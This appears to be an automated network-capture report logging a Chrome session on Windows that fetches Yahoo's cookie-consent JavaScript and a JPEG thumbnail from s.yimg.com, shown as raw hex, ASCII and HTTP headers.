                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 69 3f 2f 5e 6c 6f 61 64 65 64 7c 5e 63 2f 3a 2f 5e 6c 6f 61 64 65 64 7c 5e 69 7c 5e 63 2f 29 2e 74 65 73 74 28 6f 2e 72 65 61 64 79 53 74 61 74 65 29 29 7c 7c 6f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 61 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 6f 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 61 2c 6e 29 2c 73 3d 31 3b 6e 3d 74 2e 73 68 69 66 74 28 29 3b 29 6e 28 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 3f 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 30 29 3a 74 2e 70 75 73 68 28 65 29 7d 29 7d 2c 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 21 30 2c 6e 2e 72 75 6e 3d 6e 2e 72 75 6e 57 69 74 68 44 65 63 69 73 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: i?/^loaded|^c/:/^loaded|^i|^c/).test(o.readyState))||o.addEventListener(a,n=function(){for(o.removeEventListener(a,n),s=1;n=t.shift();)n()}),function(e){s?setTimeout(e,0):t.push(e)})},52:function(e,n,t){"use strict";n.__esModule=!0,n.run=n.runWithDecision
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 63 69 64 65 29 28 65 2c 66 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 28 30 2c 6c 2e 64 69 73 70 61 74 63 68 54 61 73 6b 43 6f 6d 70 6c 65 74 65 64 45 76 65 6e 74 29 28 22 22 2c 21 31 29 7d 7d 7d 2c 36 36 39 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 2c 74 3d 31 2c 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 3c 6f 3b 74 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: cide)(e,f)}))}catch(e){(0,l.dispatchTaskCompletedEvent)("",!1)}}},6695:function(e,n,t){"use strict";var o=this&&this.__assign||function(){return o=Object.assign||function(e){for(var n,t=1,o=arguments.length;t<o;t++)for(var i in n=arguments[t])Object.proto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC713INData Raw: 73 46 72 6f 6d 4d 65 74 61 54 61 67 73 29 28 29 7d 3b 74 72 79 7b 72 65 74 75 72 6e 28 30 2c 75 2e 67 65 74 49 74 65 6d 29 28 6d 29 26 26 28 30 2c 63 2e 64 65 66 61 75 6c 74 29 28 63 2e 73 65 72 76 69 63 65 54 79 70 65 2e 61 67 65 6e 74 41 75 74 68 29 26 26 28 74 3d 28 30 2c 73 2e 67 65 74 53 65 73 73 69 6f 6e 4f 62 6a 65 63 74 29 28 22 56 4d 41 67 65 6e 74 41 75 74 68 22 29 2c 21 28 30 2c 73 2e 69 73 56 61 6c 69 64 53 65 73 73 69 6f 6e 29 28 74 29 29 3f 67 28 29 3f 28 6f 2e 6f 75 74 63 6f 6d 65 3d 34 2c 76 6f 69 64 20 6e 28 6e 75 6c 6c 2c 6f 29 29 3a 28 6f 2e 6f 75 74 63 6f 6d 65 3d 33 2c 76 6f 69 64 20 6e 28 6e 75 6c 6c 2c 6f 29 29 3a 28 6f 2e 6f 75 74 63 6f 6d 65 3d 30 2c 6e 28 6e 75 6c 6c 2c 6f 29 2c 76 6f 69 64 28 30 2c 64 2e 64 69 73 70 61 74 63 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: sFromMetaTags)()};try{return(0,u.getItem)(m)&&(0,c.default)(c.serviceType.agentAuth)&&(t=(0,s.getSessionObject)("VMAgentAuth"),!(0,s.isValidSession)(t))?g()?(o.outcome=4,void n(null,o)):(o.outcome=3,void n(null,o)):(o.outcome=0,n(null,o),void(0,d.dispatch
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 28 32 34 39 39 29 2c 63 3d 74 28 36 36 37 30 29 2c 75 3d 74 28 38 30 33 32 29 2c 6c 3d 74 28 37 34 34 33 29 2c 64 3d 74 28 39 30 36 30 29 2c 70 3d 74 28 35 39 31 34 29 2c 66 3d 74 28 37 38 33 37 29 2c 6d 3d 74 28 37 33 38 31 29 2c 67 3d 74 28 32 33 32 34 29 2c 43 3d 74 28 38 33 33 31 29 2c 68 3d 77 69 6e 64 6f 77 2c 76 3d 64 6f 63 75 6d 65 6e 74 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 2c 6e 2c 74 2c 61 29 7b 76 61 72 20 73 2c 72 2c 63 2c 6c 3d 6f 28 7b 7d 2c 74 29 2c 70 3d 28 6e 2e 63 6f 6f 6b 69 65 52 65 73 75 6c 74 2c 6e 2e 72 65 6d 6f 74 65 52 65 73 75 6c 74 29 2c 66 3d 6e 2e 69 6e 6c 69 6e 65 55 72 69 2c 6d 3d 6e 2e 75 6e 73 61 66 65 52 65 6a 65 63 74 65 64 55 72 69 3b 6e 2e 6e 6f 72 6d 61 6c 69 7a 65 64 4f 70 74 69 6f 6e 73 26 26 28 6e 2e 6e 6f 72 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (2499),c=t(6670),u=t(8032),l=t(7443),d=t(9060),p=t(5914),f=t(7837),m=t(7381),g=t(2324),C=t(8331),h=window,v=document;function E(e,n,t,a){var s,r,c,l=o({},t),p=(n.cookieResult,n.remoteResult),f=n.inlineUri,m=n.unsafeRejectedUri;n.normalizedOptions&&(n.norm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 66 61 75 6c 74 28 65 2e 69 6e 6c 69 6e 65 55 72 69 2c 65 2e 72 65 64 69 72 65 63 74 55 72 69 2c 65 2e 69 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 73 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 68 2e 59 43 54 42 61 6e 6e 65 72 2e 69 73 41 63 74 69 76 65 3d 21 31 2c 28 30 2c 66 2e 64 69 73 70 61 74 63 68 54 61 73 6b 43 6f 6d 70 6c 65 74 65 64 45 76 65 6e 74 29 28 22 22 2c 74 29 7d 29 2c 65 2e 6e 6f 72 6d 61 6c 69 7a 65 64 4f 70 74 69 6f 6e 73 2e 75 69 4f 70 74 69 6f 6e 73 2c 22 63 6f 6e 73 65 6e 74 6a 73 22 2c 22 5f 79 62 22 2c 21 30 29 3b 69 66 28 6f 29 7b 76 61 72 20 69 3b 6f 2e 65 78 65 63 75 74 65 49 6e 6c 69 6e 65 43 6f 6e 73 65 6e 74 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6d 65 73 73 61 67 65 54 79 70 65 29 7b 63 61 73 65 20 75 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: fault(e.inlineUri,e.redirectUri,e.initialCookies,(function(){h.YCTBanner.isActive=!1,(0,f.dispatchTaskCompletedEvent)("",t)}),e.normalizedOptions.uiOptions,"consentjs","_yb",!0);if(o){var i;o.executeInlineConsent((function(n){switch(n.messageType){case u.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 6e 6e 65 72 3d 21 31 2c 6e 2e 69 6e 6c 69 6e 65 55 72 69 29 72 65 74 75 72 6e 20 76 6f 69 64 20 61 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 22 6f 76 65 72 6c 61 79 22 3b 6e 2e 6e 6f 72 6d 61 6c 69 7a 65 64 4f 70 74 69 6f 6e 73 2e 69 73 53 74 69 63 6b 79 42 61 6e 6e 65 72 26 26 28 65 3d 76 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 2e 6e 6f 72 6d 61 6c 69 7a 65 64 4f 70 74 69 6f 6e 73 2e 75 69 4f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 53 65 6c 65 63 74 6f 72 29 29 2c 65 3f 28 74 3d 22 69 6e 6c 69 6e 65 22 2c 6e 2e 6e 6f 72 6d 61 6c 69 7a 65 64 4f 70 74 69 6f 6e 73 2e 75 69 4f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 65 29 3a 28 6e 2e 6e 6f 72 6d 61 6c 69 7a 65 64 4f 70 74 69 6f 6e 73 2e 69 73 53 74 69 63 6b 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nner=!1,n.inlineUri)return void a((function(){var e,t="overlay";n.normalizedOptions.isStickyBanner&&(e=v.querySelector(n.normalizedOptions.uiOptions.containerSelector)),e?(t="inline",n.normalizedOptions.uiOptions.container=e):(n.normalizedOptions.isSticky
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 29 2c 66 3d 74 28 37 33 38 31 29 2c 6d 3d 74 28 33 31 36 38 29 2c 67 3d 77 69 6e 64 6f 77 2c 43 3d 64 6f 63 75 6d 65 6e 74 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 6e 2c 74 2c 6f 2c 69 2c 61 29 7b 76 61 72 20 73 3d 30 3b 69 66 28 65 29 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 2c 6f 29 7b 76 61 72 20 69 3d 6e 75 6c 6c 2c 61 3d 31 30 37 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 65 2e 73 74 61 74 75 73 7d 29 28 65 29 26 26 28 61 3d 65 2e 73 74 61 74 75 73 3e 30 3f 31 31 33 3a 31 30 37 2c 69 3d 65 2e 73 74 61 74 75 73 29 2c 74 2e 72 65 6d 6f 74 65 52 65 73 75 6c 74 3d 7b 6f 75 74 63 6f 6d 65 3a 61 2c 73 74 61 74 75 73 43 6f 64 65 3a 69 2c 61 63 74 69 6f 6e 3a 30 2c 63 6f 6f 6b 69 65 73 3a 5b 5d 2c 75 6e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ),f=t(7381),m=t(3168),g=window,C=document;function h(e,n,t,o,i,a){var s=0;if(e)!function(e,n,t,o){var i=null,a=107;(function(e){return void 0!==e.status})(e)&&(a=e.status>0?113:107,i=e.status),t.remoteResult={outcome:a,statusCode:i,action:0,cookies:[],uns
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 20 61 72 65 20 6e 6f 74 20 70 72 6f 70 65 72 6c 79 20 73 65 74 2e 22 2c 6e 29 2c 76 6f 69 64 28 30 2c 64 2e 64 69 73 70 61 74 63 68 54 61 73 6b 43 6f 6d 70 6c 65 74 65 64 45 76 65 6e 74 29 28 22 22 2c 21 31 29 3b 76 61 72 20 45 2c 54 3d 72 2e 63 6f 6f 6b 69 65 3b 76 6f 69 64 20 30 3d 3d 3d 54 26 26 28 54 3d 43 2e 63 6f 6f 6b 69 65 29 2c 70 2e 69 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 54 29 2c 45 3d 28 30 2c 69 2e 64 65 63 69 64 65 57 69 74 68 50 61 72 73 65 64 43 6f 6f 6b 69 65 73 29 28 70 2e 69 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 73 29 2c 70 2e 63 6f 6f 6b 69 65 52 65 73 75 6c 74 3d 45 3b 76 61 72 20 6b 3d 28 30 2c 6d 2e 67 65 74 47 70 63 50 61 72 73 65 64 43 6f 6f 6b 69 65 73 29 28 29 2c 41 3d 28 30 2c 6d 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: are not properly set.",n),void(0,d.dispatchTaskCompletedEvent)("",!1);var E,T=r.cookie;void 0===T&&(T=C.cookie),p.initialCookies=(0,o.default)(T),E=(0,i.decideWithParsedCookies)(p.initialCookies),p.cookieResult=E;var k=(0,m.getGpcParsedCookies)(),A=(0,m.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 66 69 6e 61 6e 63 65 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6c 69 66 65 73 74 79 6c 65 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 66 69 6e 61 6e 63 65 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 6f 6e 6c 69 6e 65 2d 63 6c 61 73 73 65 73 2f 66 69 74 6e 65 73 73 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tps://www.yahoo.com/entertainment/","https://finance.yahoo.com/","https://www.yahoo.com/lifestyle/","https://www.aol.com/","https://www.aol.com/finance/","https://www.aol.com/entertainment/","https://www.aol.com/online-classes/fitness/","https://www.aol.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    63192.168.2.44982687.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC530OUTGET /uu/api/res/1.2/PfuFkSI.w9qemWReAv.2kA--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/a0026210-7f1b-11ef-92ab-b839323afb9a.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1053INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="a0026210-7f1b-11ef-92ab-b839323afb9a.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "cc5d683f7579b245520de6f372ef6dd7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 11:04:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-09-30T17:20:58.678Z;desc=hit,rtt;dur=87,content-info;desc="width=356,height=180,bytes=8870,owidth=4402,oheight=2479,obytes=1195821,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-request-id: 001b0ea20b5637c8fbf8bc96ffa06eff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_id: 001b0ea20b5637c8fbf8bc96ffa06eff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 22962
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC708INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 00 b4 01 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 04 05 07 08 00 03 09 02 01 ff c4 00 47 10 00 01 03 02 04 04 03 06 03 06 05 02 05 03 05 00 01 02 03 04 05 11 00 06 12 21 07 31 41 51 13 22 61 08 14 32 71 81 91 23 42 a1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: JFIFCCdG!1AQ"a2q#B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 25 45 01 a6 15 36 31 b8 09 1e 57 51 60 46 95 0e 64 6f 7d 8e e3 be f8 e3 c9 9a c7 f8 a8 27 a2 e5 88 b7 6a 4c 58 3e ec e9 f8 90 d8 23 71 dc 13 65 fc cd 8f cf 73 8e 79 3e c5 63 1a 0c 60 52 6a d4 f7 03 da 09 d7 cc 73 38 99 64 c3 5a 2c b1 21 20 c7 69 0b 52 3f 7a cb a6 e0 8e fb 73 1f 2b fd 30 c9 0a fc 1c 5b c9 0d 78 2e 54 32 9a d5 09 77 2b 7e 0a 88 08 50 3c d6 2c 2c 0e dc c7 33 7d 40 e2 b1 39 df a2 ba 3d 65 b6 a4 1a 74 d6 52 da c0 07 43 82 c1 27 7f cb c8 0e c4 12 0f a6 34 57 e0 4a b5 86 d2 92 52 87 1a 51 b2 c2 85 ed 8c b4 4a a8 62 aa d0 90 9f f3 11 0a d2 93 cf 41 e7 84 63 25 40 75 56 08 53 ab 43 a8 02 fc 89 40 bf df ae 23 3f 4a 24 0a d4 5f 8b 12 fe 1b ca 1a 7f 86 c2 f8 9b 43 56 89 63 81 35 f9 13 a9 f2 db 79 37 43 0a 0a 40 d5 ca f7 1d ba 9b 63 ea 3f 17 fe 9a 3c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: %E61WQ`Fdo}'jLX>#qesy>c`Rjs8dZ,! iR?zs+0[x.T2w+~P<,,3}@9=etRC'4WJRQJbAc%@uVSC@#?J$_CVc5y7C@c?<
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 60 18 cc 02 33 c7 d7 1a 61 98 c1 91 98 0d 16 d8 60 10 cc 00 79 c0 32 33 01 a7 cc 02 84 5c 3b ca 8f e7 5c d7 0a 90 d3 5a d0 5c 1e 20 f4 ef 80 c3 aa dc 13 c8 b1 b2 dd 06 36 86 02 02 10 07 2e c3 15 48 07 be 27 e7 08 f9 6e 8a fb cb 7d 09 4a 10 54 a0 7d 31 9e 81 c9 8e 30 67 09 bc 53 e2 7b ac 36 f2 57 1d 2e 98 d1 c2 8f c4 f1 3a 6e 3d 2e a4 e1 65 2b 43 22 ed 7b 3a 65 2a 25 13 2a b2 cd 0d a7 a4 7e cd 63 dd 0b f2 5b 29 0e 28 24 15 ae e7 75 5c 93 bf 20 00 03 6c 72 4f d2 f0 5a 17 71 51 86 ab ab f7 e9 0f bd 11 21 08 71 eb a0 12 e6 94 d9 42 c7 7b 10 9b dc 74 b7 7c 4e 5b 2a 88 5f 20 f0 61 ee 25 66 04 55 54 cc 88 b4 d6 e4 dc a9 e0 94 ad c6 9b 51 f1 09 d3 74 ab 49 1c b7 1e 5b 6f 72 a5 46 48 d2 d6 d6 29 34 da 55 1c d3 62 47 05 90 df 82 d3 23 6d b9 21 37 f4 16 fb 1f 96 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: `3a`y23\;\Z\ 6.H'n}JT}10gS{6W.:n=.e+C"{:e*%*~c[)($u\ lrOZqQ!qB{t|N[*_ a%fUTQtI[orFH)4UbG#m!7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 7d 60 5b 6f e6 3e 67 98 38 cf 9a b4 3a 85 8c 8f e6 19 0d ae d2 4e a5 7c 29 5a ce ca ec 15 fa ef 84 96 62 8b 0a 62 44 56 13 52 d5 15 c2 5b 7d 22 fe 0a be 11 f2 ff 00 6e 9d 39 e2 12 93 24 e2 93 d0 d9 56 f0 83 49 4b a8 52 56 09 b2 86 c1 07 d7 d3 11 94 99 94 30 37 5e 93 10 88 d2 db 52 02 7f 38 37 1f 5f ef 97 cb 11 73 68 6e 81 4e 5f ce 71 5d 69 54 da a3 fa 12 f5 80 72 f7 0d 3d f3 e9 7b f6 e9 8b e0 e4 7d 30 f8 ed 0e 93 53 2e 3a 02 ca 4b b1 85 83 4e 1e 69 07 9a 4f a5 ef 6e d7 c5 df f6 da 39 5a a6 21 6a a8 18 73 43 89 29 b7 54 f3 3f 4f ec 61 5a a3 4f 6e 56 52 b0 10 e5 9d 06 fb 29 24 7f 2b e1 3e 4a 32 86 a7 e5 c6 79 cd 6d 4a 69 bb 6d 6d 58 a4 79 09 19 d2 c4 ff 00 b5 a4 42 42 de 84 e3 6a 59 e6 56 d2 55 6f 51 b5 c1 fa e3 a6 1c 9f fd 39 65 c7 09 38 74 98 e9 af 0a dd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: }`[o>g8:N|)ZbbDVR[}"n9$VIKRV07^R87_shnN_q]iTr={}0S.:KNiOn9Z!jsC)T?OaZOnVR)$+>J2ymJimmXyBBjYVUoQ9e8t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 85 58 73 49 42 1c 49 ff 00 f3 23 e9 8b 44 9b 07 51 cf 0c 29 b5 47 00 e0 e5 4a 5a da 94 d2 92 3f 36 00 3a 2d ec 59 54 15 0c b0 c3 6e bb f0 9b 03 6c 34 4c 65 a1 cc 99 59 ba 8d 21 f8 ee 20 58 a4 8b 5a f7 c5 3a 8a 73 0f da 6f 86 0b c9 39 bd fa 9c 36 0b 71 25 2b 70 07 25 dc f5 c4 e4 3a a6 42 89 c2 81 eb 00 19 80 0c c0 03 96 01 0c c0 07 9c 00 79 56 00 2e 8f b1 6f 09 5c 2d 33 98 67 45 3e 2c 82 95 85 1e dd 47 f2 fb e1 e2 05 f4 01 9a 55 2b 41 16 01 22 c3 15 4a c0 e7 f7 b7 1f 18 4c 78 ce e5 aa 64 93 e3 4a 51 6f 63 c9 36 df 0a c0 a4 b4 aa 5c aa a4 b4 42 84 de b7 5c 50 1f 7e b8 c8 ec 0e 8a 7b 28 f0 1d 34 0a 74 5a 8c a8 89 2f 10 92 b5 11 bd f0 f5 a1 91 67 b8 a1 30 e5 9e 1e ae 34 35 e9 95 21 05 88 e8 23 6f 15 77 4a 6f df a9 c7 9d 99 d9 54 03 71 96 67 f8 7f 20 2e 1b 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: XsIBI#DQ)GJZ?6:-YTnl4LeY! XZ:so96q%+p%:ByV.o\-3gE>,GU+A"JLxdJQoc6\B\P~{(4tZ/g045!#owJoTqg .
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: ac 93 b2 a5 65 15 fe 12 50 a5 32 9d 1e ff 00 0d 0f 95 85 5c a4 a9 20 8b 1e 46 c1 5f 7b e2 52 2a 86 59 12 c2 4b 75 26 5b 2d b8 d3 91 aa c9 41 37 52 52 b4 e9 71 bf 98 da c3 ba 31 29 32 91 1a 73 44 96 93 52 f7 86 15 b0 2b 96 cf aa 2c 12 f2 3e 40 e9 51 ef a8 f2 b6 23 27 aa 3a 20 f6 05 a2 7a 69 55 b9 54 a2 bf 12 2c 9b 38 95 1d 89 6d 40 11 f2 d2 a2 48 f9 e3 92 7a 3d 28 af e9 63 8c 74 15 29 69 1c f5 63 9d ec f4 71 6d 1b c5 2d e7 d5 b0 b7 d3 01 47 07 46 89 d4 19 0b 4a 95 1d ae 7c f1 a8 90 2f 51 ff 00 1b 40 05 10 9a 41 d5 f1 15 6f cb 97 f5 c1 46 aa 60 5c ca 17 14 b3 bc df 0e a3 29 51 62 a5 44 14 b3 b0 5e ff 00 a7 d4 f5 c6 24 63 43 75 57 82 ec 89 cb 62 70 4a d9 46 c8 45 8f 99 47 b9 e6 49 b7 33 8a c7 5e 11 70 4f 63 2e 6c ff 00 09 70 ab 2e 4b ab ca 80 1f 70 36 1b 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eP2\ F_{R*YKu&[-A7RRq1)2sDR+,>@Q#': ziUT,8m@Hz=(ct)icqm-GFJ|/Q@AoF`\)QbD^$cCuWbpJFEGI3^pOc.lp.Kp6b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 5b f0 a5 37 e2 bd 19 31 59 d2 d3 0b 50 d2 a5 11 72 a7 14 52 48 bf 4e 7c ed 8e ff 00 e5 7d 1c d1 fc 5f d9 3a f0 cf 20 cf 0e 1a cd 69 a4 21 d7 8e a5 13 7d f1 e6 f2 64 e4 7b 10 85 13 44 78 82 3b 61 29 00 0b 72 c7 0f 53 d3 c0 e8 64 a9 48 08 71 6b b5 ed 84 71 3d 24 56 4f 68 fc 9d 4c aa 53 95 58 10 7c 55 b4 54 85 00 ab 16 d0 b0 50 57 7d ef a4 2f 55 ba e9 1b e2 6a 34 cf 37 f2 31 b5 45 66 ca 1e f1 c3 c9 4f 3b 56 75 88 f3 69 ab 79 a0 c8 78 9f 01 16 0b 0a 57 20 6f a8 28 02 0f 30 6c 46 f8 f5 5c 35 a3 e6 bb ec b4 be cd d9 96 5d 73 24 53 ab 35 06 4a 65 3c 80 b7 1b 25 57 03 56 94 ab 7e 40 a4 02 31 cd 35 43 b6 58 99 d0 1a 9b 44 75 a7 1a 0a 50 4d d1 7e 87 d3 13 92 b2 48 8e 26 44 71 87 01 41 be 93 e5 55 b9 db f9 1f 4c 73 2f ea f4 33 da 1c a3 32 66 46 75 e6 36 5d 92 75 7f
